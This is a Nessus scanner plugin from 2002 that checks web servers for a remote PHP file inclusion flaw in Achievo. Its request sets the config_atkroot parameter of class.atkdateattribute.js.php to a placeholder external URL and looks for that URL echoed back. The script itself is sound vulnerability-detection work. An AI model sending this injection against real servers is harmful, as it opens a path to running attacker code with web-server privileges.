#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(11109);
 script_version ("$Revision: 1.1.4.1 $");

 name["english"] = "Achievo code injection";

 script_name(english:name["english"]);
 
 desc["english"] = "
It is possible to make the remote host include php files hosted
on a third party server using Achievo.

An attacker may use this flaw to inject arbitrary code in the remote
host and gain a shell with the privileges of the web server.

Solution : Upgrade to Achievo 8.2 or newer
Risk factor : Serious";




 script_description(english:desc["english"]);
 
 summary["english"] = "Checks for the presence of Achievo";
 
 script_summary(english:summary["english"]);
 
 script_category(ACT_ATTACK);
 
 
 script_copyright(english:"This script is Copyright (C) 2002 Renaud Deraison",
		francais:"Ce script est Copyright (C) 2002 Renaud Deraison");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");

port = get_kb_item("Services/www");
if(!port) port = 80;

dir[0] = cgibin();
dir[1] = string(dir[0], "/achievo");
dir[2] = "";

if(get_port_state(port)){
 for(i = 0; dir[i] ; i = i +  1)
 {
 req = http_get(item:string(dir[i], "//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/"),
 		port:port);
 soc = http_open_socket(port);
 if(!soc)
  exit(0);
 send(socket:soc, data:req);
 r = http_recv(socket:soc);
 close(soc);
 if("http://xxxxxxxxxx/atk/" >< r)
  {
 	security_hole(port);
	exit(0);
  }
 }
}
